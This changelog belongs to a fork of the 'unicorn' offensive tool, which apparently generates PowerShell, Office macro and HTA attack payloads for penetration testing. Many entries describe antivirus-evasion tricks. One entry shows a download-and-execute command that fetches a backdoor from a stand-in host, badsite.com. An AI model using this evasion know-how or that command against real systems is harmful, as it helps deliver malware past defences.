forked from trustedsec/unicorn
CHANGELOG.txt
~~~~~~~~~~~~~~~~
version 2.7.2
~~~~~~~~~~~~~~~~
* random cleanup
~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~
* fixed merge issue
~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~
* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names
~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~
* fixed an issue when generating an HTA: if the output folder already existed it would not be removed properly and overwritten
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability
~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~
* minor string format cleanup
* pep8 formatting
~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~
* complete overhaul of macro injection - adds heavy obfuscation throughout the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code
~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* shortened -window hidden to -w 1, which is shorthand for window hidden
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* added shortened method for obfuscation
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfuscation that should not get picked up anymore and removes the need for -e or -ec
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc rather than -EncodedCommand, and combined with base64 this would trigger Windows Defender; this change appears to get around it on both the macro and the standard ps1/encoded command parameters
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* changed auto_open to AutoOpen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fixed indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note that the target does not need to be an exe; it can be whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet, but it's better than before) - AV was picking up on variable names and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* set EnableStageEncoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added the --smallest flag to the msfvenom generation, which compacts the shellcode to a smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added the ability to import your own PowerShell into attacks (thanks to curi0usJack's pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down the payload. This is due to character length restrictions when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to UTF and base64 encoding. This will now throw off signatures if contained inside of a file.
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where PowerShell injection may not work on 32-bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed AutoOpen not working on some Office implementations - now works on all Office documents including PowerPoint/Word/Excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions, when using the macro attack, on how to add the macro to an Office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when they were not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened PowerShell injection code by removing unused code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded PowerShell command, removed unused else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated the msfvenom call to include format type and architecture, fixing a bug where it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn